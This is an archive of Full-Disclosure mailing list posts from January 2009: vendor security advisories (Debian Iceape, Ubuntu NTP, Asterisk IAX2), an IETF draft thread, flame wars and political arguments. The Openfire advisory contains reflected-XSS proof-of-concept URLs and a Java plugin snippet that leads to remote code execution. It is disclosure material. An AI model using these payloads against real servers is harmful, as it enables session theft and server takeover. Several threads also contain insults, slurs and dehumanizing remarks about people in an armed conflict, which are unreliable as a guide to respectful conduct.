Re: [Full-disclosure] [Suspected Spam]Security Assessment of the Internet Protocol the IETF
Hi, I still not have read all your paper, but my first word is congratulations! That's an hard job. Since a quick search didn't give a result for it, and maybe others could be interested: The AVISPA (Automated Validation of Internet Security Protocols and Applications) project aims at developing a push-button, industrial-strength technology for the analysis of large-scale Internet security-sensitive protocols and applications. This website contains all relevant information about AVISPA for project members, interested third parties and scientists worldwide. http://www.avispa-project.org/ My 2 cents for now /JA Fernando Gont a écrit : Folks, In August 2008 the UK CPNI (United Kingdom's Centre for the Protection of National Infrastructure) published the document Security Assessment of the Internet Protocol. The motivation of the aforementioned document is explained in the Preface of the document itself. (The paper is available at: http://www.cpni.gov.uk/Docs/InternetProtocol.pdf ) Once the paper was published by CPNI, I produced an IETF Internet-Draft version of the same paper, with the intent of having the IETF publish recommendations and/or update the specifications where necessary. This IETF Internet-Draft is available at: http://www.gont.com.ar/drafts/ip-security/index.html (and of course it's also available at the IETF I-D repository). The Internet-Draft I published was aimed at the OPSEC WG. And the Working Group is right now deciding whether to accept this document as a WG item. This is certainly a critical step. Having the OPSEC WG accept this document as a WG item would guarantee to some extent that the IETF will do something about all this, and would also somehow set a precedent in updating the specifications of core protocols and/or providing advice on security aspects of them. The call for consensus is available at: http://www.ietf.org/mail-archive/web/opsec/current/msg00373.html . You can voice your opinion on the relevant mailing-list sending an e-mail to op...@ietf.org . You don't need to subscribe to the mailing list to post a message (although your message will be held for moderator approval before it is distributed to the list members). The deadline for posting your opinion is January 9th (next Friday). Thanks so much! Kind regards, Fernando Gont -- Fernando Gont e-mail: ferna...@gont.com.ar || fg...@acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1697-1] New iceape packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1697-1 secur...@debian.org http://www.debian.org/security/ Steffen Joeris January 07, 2009 http://www.debian.org/security/faq - Package: iceape Vulnerability : several vulnerabilities Problem type : remote Debian-specific: no CVE ID : CVE-2008-0016 CVE-2008-0304 CVE-2008-2785 CVE-2008-2798 CVE-2008-2799 CVE-2008-2800 CVE-2008-2801 CVE-2008-2802 CVE-2008-2803 CVE-2008-2805 CVE-2008-2807 CVE-2008-2808 CVE-2008-2809 CVE-2008-2810 CVE-2008-2811 CVE-2008-2933 CVE-2008-3835 CVE-2008-3836 CVE-2008-3837 CVE-2008-4058 CVE-2008-4059 CVE-2008-4060 CVE-2008-4061 CVE-2008-4062 CVE-2008-4065 CVE-2008-4067 CVE-2008-4068 CVE-2008-4069 CVE-2008-4070 CVE-2008-5012 CVE-2008-5013 CVE-2008-5014 CVE-2008-5017 CVE-2008-0017 CVE-2008-5021 CVE-2008-5022 CVE-2008-5500 CVE-2008-5503 CVE-2008-5506 CVE-2008-5507 CVE-2008-5508 CVE-2008-5511 CVE-2008-5512 Several remote vulnerabilities have been discovered in Iceape an unbranded version of the Seamonkey internet suite. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-0016 Justin Schuh, Tom Cross and Peter Williams discovered a buffer overflow in the parser for UTF-8 URLs, which may lead to the execution of arbitrary code. (MFSA 2008-37) CVE-2008-0304 It was discovered that a buffer overflow in MIME decoding can lead to the execution of arbitrary code. (MFSA 2008-26) CVE-2008-2785 It was discovered that missing boundary checks on a reference counter for CSS objects can lead to the execution of arbitrary code. (MFSA 2008-34) CVE-2008-2798 Devon Hubbard, Jesse Ruderman and Martijn Wargers discovered crashes in the layout engine, which might allow the execution of arbitrary code. (MFSA 2008-21) CVE-2008-2799 Igor Bukanov, Jesse Ruderman and Gary Kwong discovered crashes in the Javascript engine, which might allow the execution of arbitrary code. (MFSA 2008-21) CVE-2008-2800 moz_bug_r_a4 discovered several cross-site scripting vulnerabilities. (MFSA 2008-22) CVE-2008-2801 Collin Jackson and Adam Barth discovered that Javascript code could be executed in the context or signed JAR archives. (MFSA 2008-23) CVE-2008-2802 moz_bug_r_a4 discovered that XUL documements can escalate privileges by accessing the pre-compiled fastload file. (MFSA 2008-24) CVE-2008-2803 moz_bug_r_a4 discovered that missing input sanitising in the mozIJSSubScriptLoader.loadSubScript() function could lead to the execution of arbitrary code. Iceape itself is not affected, but some addons are. (MFSA 2008-25) CVE-2008-2805 Claudio Santambrogio discovered that missing access validation in DOM parsing allows malicious web sites to force the browser to upload local files to the server, which could lead to information disclosure. (MFSA 2008-27) CVE-2008-2807 Daniel Glazman discovered that a programming error in the code for parsing .properties files could lead to memory content being exposed to addons, which could lead to information disclosure. (MFSA 2008-29) CVE-2008-2808 Masahiro Yamada discovered that file URLS in directory listings were insufficiently escaped. (MFSA 2008-30) CVE-2008-2809 John G. Myers, Frank Benkstein and Nils Toedtmann discovered that alternate names on self-signed certificates were handled insufficiently, which could lead to spoofings of secure connections. (MFSA 2008-31) CVE-2008-2810 It was discovered that URL shortcut files could be used to bypass the same-origin restrictions. This issue does not affect current Iceape, but might occur with additional extensions installed. (MFSA 2008-32) CVE-2008-2811 Greg McManus discovered a crash in the block reflow code, which might allow the execution of arbitrary code. (MFSA 2008-33) CVE-2008-2933 Billy Rios discovered that passing an URL containing a pipe symbol to Iceape can lead to Chrome privilege escalation. (MFSA 2008-35) CVE-2008-3835 moz_bug_r_a4 discovered that the same-origin check in nsXMLDocument::OnChannelRedirect() could be bypassed. (MFSA 2008-38) CVE-2008-3836 moz_bug_r_a4 discovered that several vulnerabilities in feedWriter could lead to Chrome privilege escalation. (MFSA 2008-39) CVE-2008-3837 Paul Nickerson discovered that an attacker could move windows during a mouse click, resulting in unwanted action triggered by drag-and-drop. (MFSA 2008-40) CVE-2008-4058 moz_bug_r_a4 discovered a vulnerability which can result in Chrome privilege escalation through XPCNativeWrappers. (MFSA 2008-41) CVE-2008-4059 moz_bug_r_a4 discovered a vulnerability which
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote: I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd. I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Yeah but you also see the world in some fucked up, retarded, distorted, and psychedelic way while the rest of us see it normally. On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote: On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote: I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd. I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
This is the average user response from full-disclosure, no capacity to have a serious conversation. On Thu, Jan 8, 2009 at 2:15 PM, vulcanius vulcan...@gmail.com wrote: Yeah but you also see the world in some fucked up, retarded, distorted, and psychedelic way while the rest of us see it normally. On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote: I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
o i c. were dumb and ur smart.. On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote: On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote: I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd. I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Never :) On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote: so leave? On Thu, Jan 8, 2009 at 9:23 AM, n3td3v xploita...@gmail.com wrote: This is the average user response from full-disclosure, no capacity to have a serious conversation. On Thu, Jan 8, 2009 at 2:15 PM, vulcanius vulcan...@gmail.com wrote: Yeah but you also see the world in some fucked up, retarded, distorted, and psychedelic way while the rest of us see it normally. On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote: I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Yes you are pretty dumb. On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote: o i c. were dumb and ur smart.. On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote: On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote: I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd. I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Can please eveyone reply to this thread so I know who hates who (it's for my Social profile of this list) But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already it's easy and I know people that know people to provide the pure stuff) anyways kids, Cheers. Steve Clement On Jan 8, 2009, at 4:17 PM, n3td3v wrote: Yes you are pretty dumb. On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote: o i c. were dumb and ur smart.. On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote: On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote: I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd. I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
It's some kind of peer pressure tactic he's been trying, its pretty lame though and just ruins the list by arguing with me. I'm not like Gobbles who released a vulnerability out of peer preassure that was pretty lame :) You're messing with the big boys Ureleet, so maybe after a whole year trying your tactic, you kill off your nickname now and try something different on a different name? On Thu, Jan 8, 2009 at 3:40 PM, Steve Clement st...@localhost.lu wrote: Can please eveyone reply to this thread so I know who hates who (it's for my Social profile of this list) But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already it's easy and I know people that know people to provide the pure stuff) anyways kids, Cheers. Steve Clement ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1128: Openfire multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Openfire multiple vulnerabilities
1. *Advisory Information*
Title: Openfire multiple vulnerabilities
Advisory ID: CORE-2008-1128
Advisory URL:
http://www.coresecurity.com/content/openfire-multiple-vulnerabilities
Date published: 2009-01-08
Date of last update: 2009-01-07
Vendors contacted: Jive Software
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Cross site scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 32935, 32937, 32938, 32939, 32940, 32943, 32944, 32945
CVE Name: N/A
3. *Vulnerability Description*
Openfire is a real time collaboration (RTC) server licensed under the
Open Source GPL. It uses the widely adopted open protocol for instant
messaging XMPP, also called Jabber. Multiple cross-site scripting
vulnerabilities have been found, which may lead to arbitrary remote code
execution on the server running the application due to unauthorized
upload of Java plugin code.
4. *Vulnerable packages*
. Openfire 3.6.2
5. *Non-vulnerable packages*
. Openfire 3.6.3
6. *Vendor Information, Solutions and Workarounds*
Openfire will release a fixed version through their community web site [1].
7. *Credits*
These vulnerabilities were discovered and researched by Federico Muttis,
from CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
Multiple cross-site scripting vulnerabilities have been found in
Openfire, which may lead to arbitrary remote code execution on the
server running Openfire server due to unauthorized upload of Java plugin
code.
8.1. *Reflected XSS Vulnerabilities*
Several cross site scripting (XSS) were detected that lead to cross site
request forgery (XSRF), which enable arbitrary remote code execution on
the server running the application. These vulnerabilities are network
exploitable but the victim must voluntarily interact with the attack
mechanism. The victim must be an authorized user to deploy the complete
attack.
We identified insufficient sanitization of several parameters in several
scripts. In the case of 'logviewer.jsp' (BID 32935), 'group-summary.jsp'
(BID 32937), 'user-properties.jsp' (BID 32938) and 'audit-policy.jsp'
(BID 32939) there is no sanitization at all. In 'log.jsp' (BID 32940)
there is a filter against 'script', which is not enough, because
several other XSS vectors exist, like the one we show below.
Proof of Concept 'alert()' exploits follow.
[BID 32935] Insufficient sanitization in 'logviewer.jsp', parameter 'log':
/---
http://vulnsite.com/logviewer.jsp?clearLog=falseemailLog=falselines=log=%22/%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--markLog=falsemode=descrefresh=saveLog=false
- ---/
[BID 32937] Insufficient sanitization in 'group-summary.jsp', parameter
'search':
/---
http://vulnsite.com/group-summary.jsp?search=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E!--
- ---/
[BID 32938] Insufficient sanitization in 'user-properties.jsp',
parameter 'username':
/---
http://vulnsite.com/user-properties.jsp?username=%3Cscript%3Ealert(%27xss%27)%3C/script%3E
- ---/
[BID 32939] Insufficient sanitization in 'audit-policy.jsp', the
vulnerable parameters are: 'logDir', 'logTimeout', 'maxDays',
'maxFileSize' and 'maxTotalSize'.
/---
http://vulnsite.com/audit-policy.jsp?maxTotalSize=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--update=Save%20Settings
- ---/
[BID 32940] Insufficient sanitization in 'log.jsp', 'script' gets
filtered out but vectors like 'img' still work:
/---
http://vulnsite.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27javascript:alert(%22xss%22)%27%3E
- ---/
8.2. *Arbitrary Remote Code Execution*
Once the Openfire administrator's browser is executing arbitrary
Javascript and his/her session cookies have been stolen, it is trivial
to execute arbitrary code as there is no need to re-authenticate to
upload a new server plugin. Secure web applications generally
re-authenticate the administrator when performing such sensitive tasks.
In this case, however, you can simply upload a new plugin, without
re-authentication, with arbitrary Java code on the constructor. The
constructor will be called when the plugin is uploaded.
In order to create a potentially malicious plugin that executes
arbitrary Java code on the context of the server, you need to download
the Openfire source [2] and the apache ant tool [3]. Uncompress the
Openfire source and install the ant tool. You can modify any existing
plugin, add this code and call it from the constructor:
/---
public void start() {
try {
Runtime.getRuntime().exec(C:\\WINDOWS\\system32\\calc.exe);
} catch (Exception ex) {
ex.printStackTrace();
}
}
- ---/
Then
[Full-disclosure] [USN-705-1] NTP vulnerability
=== Ubuntu Security Notice USN-705-1 January 08, 2009 ntp vulnerability CVE-2009-0021 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: ntp-refclock1:4.2.0a+stable-8.1ubuntu6.1 ntp-simple 1:4.2.0a+stable-8.1ubuntu6.1 Ubuntu 7.10: ntp 1:4.2.4p0+dfsg-1ubuntu2.1 Ubuntu 8.04 LTS: ntp 1:4.2.4p4+dfsg-3ubuntu2.1 Ubuntu 8.10: ntp 1:4.2.4p4+dfsg-6ubuntu2.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that NTP did not properly perform signature verification. A remote attacker could exploit this to bypass certificate validation via a malformed SSL/TLS signature. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.1.diff.gz Size/MD5: 268991 14166f5e0933968dd3a23db799bc3e45 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.1.dsc Size/MD5: 872 01f2feda3ccc49b651948cccbd3a8dc9 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable.orig.tar.gz Size/MD5: 2272395 30f8b3d5b970c14dce5c6d8c922afa3e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-doc_4.2.0a+stable-8.1ubuntu6.1_all.deb Size/MD5: 890912 9e95577b5de6166f4c140f8c8d94a878 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-server_4.2.0a+stable-8.1ubuntu6.1_amd64.deb Size/MD5:34728 ae79310d84cf954c745741dc3577a111 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-simple_4.2.0a+stable-8.1ubuntu6.1_amd64.deb Size/MD5: 136030 598ebb288aa3e3bf2cbdde435e939925 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.1_amd64.deb Size/MD5: 270246 8d66671574a8bdec39f40ee97844e7a2 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.0a+stable-8.1ubuntu6.1_amd64.deb Size/MD5:47596 4478446cb6a262180a2a5f055434709f http://security.ubuntu.com/ubuntu/pool/universe/n/ntp/ntp-refclock_4.2.0a+stable-8.1ubuntu6.1_amd64.deb Size/MD5: 223814 1e2d67925cc2fb3509262ff42fbad9f1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-server_4.2.0a+stable-8.1ubuntu6.1_i386.deb Size/MD5:33610 b55a8c87bbff16a99cac7c03689846b7 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-simple_4.2.0a+stable-8.1ubuntu6.1_i386.deb Size/MD5: 121362 76052fc1e3e25fccc256f52b5a81fe1a http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.1_i386.deb Size/MD5: 256456 edb3ce6ee23a5b17dbe60065c6141137 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.0a+stable-8.1ubuntu6.1_i386.deb Size/MD5:44314 054706327c06bd7085dd95533a2f8653 http://security.ubuntu.com/ubuntu/pool/universe/n/ntp/ntp-refclock_4.2.0a+stable-8.1ubuntu6.1_i386.deb Size/MD5: 198136 c0c4aa0d7862afbfd5c6300b00cbadb1 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-server_4.2.0a+stable-8.1ubuntu6.1_powerpc.deb Size/MD5:36868 5f56589b8e6d931eb40e90d0667123da http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-simple_4.2.0a+stable-8.1ubuntu6.1_powerpc.deb Size/MD5: 134860 9f0273dfe7b9ecb632f5598800d86148 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.1_powerpc.deb Size/MD5: 271210 1b3fe8f1df3e88bcbfa3e2ad05509021 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.0a+stable-8.1ubuntu6.1_powerpc.deb Size/MD5:48924 d448c4182005d934a815370a16bf639a http://security.ubuntu.com/ubuntu/pool/universe/n/ntp/ntp-refclock_4.2.0a+stable-8.1ubuntu6.1_powerpc.deb Size/MD5: 221924 fbc5b6e77bd48e3c6309630bf75bc12d sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-server_4.2.0a+stable-8.1ubuntu6.1_sparc.deb Size/MD5:34126 fa41cd244d976002da1719a05b4e5d34 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-simple_4.2.0a+stable-8.1ubuntu6.1_sparc.deb Size/MD5: 126440 83e78b6cebce198f494accde5f8109f9 http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.1_sparc.deb Size/MD5: 261340 f9ac80e3066fc27f8d90e0a9452fdc9f
[Full-disclosure] AST-2009-001: Information leak in IAX2 authentication
Asterisk Project Security Advisory - AST-2009-001 ++ | Product| Asterisk| |--+-| | Summary| Information leak in IAX2 authentication | |--+-| | Nature of Advisory | Unauthorized data disclosure| |--+-| |Susceptibility| Remote Unauthenticated Sessions | |--+-| | Severity | Minor | |--+-| |Exploits Known| Yes | |--+-| | Reported On | October 15, 2008| |--+-| | Reported By | http://www.unprotectedhex.com | |--+-| | Posted On | January 7, 2009 | |--+-| | Last Updated On| January 7, 2009 | |--+-| | Advisory Contact | Tilghman Lesher tlesher AT digium DOT com| |--+-| | CVE Name | CVE-2009-0041 | ++ ++ | Description | IAX2 provides a different response during authentication | | | when a user does not exist, as compared to when the | | | password is merely wrong. This allows an attacker to | | | scan a host to find specific users on which to | | | concentrate password cracking attempts. | | | | | | The workaround involves sending back responses that are | | | valid for that particular site. For example, if it were | | | known that a site only uses RSA authentication, then | | | sending back an MD5 authentication request would | | | similarly identify the user as not existing. The | | | opposite is also true. So the solution is always to send | | | back an authentication response that corresponds to a| | | known frequency with which real authentication responses | | | are returned, when the user does not exist. This makes | | | it very difficult for an attacker to guess whether a | | | user exists or not, based upon this particular | | | mechanism. | ++ ++ | Resolution | Upgrade to revision 167259 of the 1.2 branch or 167260 of | || the 1.4 branch or one of the releases noted below.| ++ ++ | Affected Versions| || | Product | Release | | || Series | | |+-+-| |Asterisk Open Source| 1.2.x | All version prior to 1.2.31 | |+-+-| |Asterisk Open Source| 1.4.x | All versions prior to | || | 1.4.23-rc4 | |+-+-| |Asterisk Open Source| 1.6.x | All versions prior to | || | 1.6.0.3-rc2 | |+-+-| |
Re: [Full-disclosure] The war in Palestine
On Sun, Jan 04, 2009 at 10:15:49PM -0600, Paul Schmehl wrote: So you think it's evil to shoot back when someone is shooting at you? this may depend on your religion. iirc jesus turned the other cheek. what you seem to be saying is the ambiguous quote: one man's terrorist is another man's freedom fighter -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The war in Palestine
--On Thursday, January 08, 2009 13:38:37 -0600 Georgi Guninski gunin...@guninski.com wrote: On Sun, Jan 04, 2009 at 10:15:49PM -0600, Paul Schmehl wrote: So you think it's evil to shoot back when someone is shooting at you? this may depend on your religion. iirc jesus turned the other cheek. Not sure how he (or even religion in general) got dragged in to this what you seem to be saying is the ambiguous quote: one man's terrorist is another man's freedom fighter That's a bs phrase anyway. Terrorists are very easy to define. They target and kill civilians deliberately. That is a completely unambiguous definition. Notice I said deliberately. Civilians always die in armed conflicts. Terrorists kill them on purpose. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** Check the headers before clicking on Reply. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The war in Palestine
I say let the animals eat each other... I'm sorry to be callous but there's just no reason to throw civilized society into a frenzy over this. This is a battle that has raged since forever, and I'm willing to bet that most of these people (loosely termed) can't even remember why the hell they're fighting each other, or why they hate each other. Stupidity of the human race I guess... __ Raf -- From: Paul Schmehl pschmehl_li...@tx.rr.com Sent: Thursday, January 08, 2009 2:28 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] The war in Palestine --On Thursday, January 08, 2009 13:38:37 -0600 Georgi Guninski gunin...@guninski.com wrote: On Sun, Jan 04, 2009 at 10:15:49PM -0600, Paul Schmehl wrote: So you think it's evil to shoot back when someone is shooting at you? this may depend on your religion. iirc jesus turned the other cheek. Not sure how he (or even religion in general) got dragged in to this what you seem to be saying is the ambiguous quote: one man's terrorist is another man's freedom fighter That's a bs phrase anyway. Terrorists are very easy to define. They target and kill civilians deliberately. That is a completely unambiguous definition. Notice I said deliberately. Civilians always die in armed conflicts. Terrorists kill them on purpose. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** Check the headers before clicking on Reply. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ImmunitySec is an NSA front.
Well it's now an Israeli Plot. On Thu, Jan 8, 2009 at 9:52 PM, ChromeSilver chromesil...@exec-labs.comwrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Prof. Chatner, I don't know what you mean, on GoogleEarth it's 3D-Building. Cheers, ChromeSilver If light be the brightest light... Wherfore then doth it shadows cast? - -R.Rohonyi Professor Micheal Chatner schrieb: I have recently witnessed a conspiracy by ImmunitySEC headed by the Israeli spy David Aitel. http://maps.google.com/maps?q=IMMUNITYSEC,+miami,+floe=utf-8client=firefox-aie=UTF8ll=25.783508,-80.140972spn=0,359.818039z=13iwloc=Alayer=ccbll=25.783635,-80.140995panoid=RuVREzzTYFjcmaegYtzhRgcbp=12,441.86166752012093,,0,5 As you can see their entire road is BLURRED OUT. This is obviously a tactic to keep out the Chinese spies that they time and time again sell 0day to. It is too complicated to explain now but I will have more research later. Professor Micheal Chatner, M.D. CISSP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSWZZi4VSCfUHd8OQAQK7ew/8C3V94vIJQvK9CtxWvYIe+707a4NNDzRV JH2dgMrgKZFUAWkbbGiOmBUiW5Mz4b8oQN0eCvYxD/hQoDTtRAEuG6u9x9lwmcsb +sRf9qpzOp5AQdEe2neZMQGp78E8hj1iXuTKlazAibrpal+PIKDoB7QGQgiLdsEm EPDfnhWoTg+NavaJyUOvW0zHmEq5zAx1jMs2uv8MENm4eciJcLo3MQCk3+d2M0s2 roX23ipRuemAPzVPMUwVYDrxfd/AbRxShhSzvejm969hFvYXzyHrSy1EZ9cOFY/e 1UNhsYaFEKE3ZucL8zCiE/p9OzG77dZdSVz6qNCeTZCespgvCU8Qzuqcz/onqBoZ Mc+9vTXTHbA0EcustCYLIvkFLrP8vND/wx3YR/+V5GaxAzZCvEqJ+0txz9dWJO14 TwSnPtOoPL/NXyj6he5Dz4UVd1s/FTS5mHSReZR1bVKaiBSUxLivvW39M5WkdMG7 dscwI4rXN+xg/AL4x8zKvTpfq1WmKe9IZW102Wg6qSn1kBYALY7Je+BSQNrDS6nE 8ITUO+sEFyoATXYkJ+NfR1D8/uE9hScwspdDwZo0W5mqwaFjK4/tuTKl6UodnGlA t6oKgPcxvfsBlCg+Uljv8yIuvlFmTWxblTPxBynQOwLgCWwPyeA464MhTluZqx1h zfhXS88jYuI= =i0Z9 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - 